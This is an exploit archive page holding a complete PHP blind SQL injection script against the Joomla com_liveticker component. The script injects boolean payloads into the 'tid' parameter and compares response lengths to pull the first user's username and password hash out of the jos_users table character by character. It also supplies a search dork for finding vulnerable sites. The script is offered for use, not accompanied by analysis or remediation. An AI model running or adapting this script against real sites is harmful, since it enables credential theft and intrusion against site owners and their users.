Joomla Live Ticket Blind SQL Injection

Joomla Live Ticket Blind SQL Injection: Posted Feb 28, 2010; Authored by Snakespc; This is a remote blind SQL injection exploit for an old vulnerability discovered in the Joomla LiveTicker component.; tags | exploit, remote, sql injection; SHA-256 | c07584d6bbe6d08d48a09a74a211eca058548885847b4332abaa54de038d8b8a; Download | Favorite | View

Joomla Live Ticket Blind SQL Injection

#!/usr/bin/php
<?php
ini_set("max_execution_time",0);
print_r('
#####################################################################
[»] Joomla com_liveticker Remote Blind Injection Vulnerability
#####################################################################
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com ]
[»] Site:     [ sec-war.com/cc>]
[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie
[»] Dork:     [ inurl:index.php?option=com_liveticker "viewticker" ]
######################################################################
######################################################################
#  Joomla com_liveticker (tid) Blind SQL Injection Exploit
#  [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1"
######################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?>

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Joomla Live Ticket Blind SQL Injection

Joomla Live Ticket Blind SQL Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Live Ticket Blind SQL Injection

Share This

Joomla Live Ticket Blind SQL Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems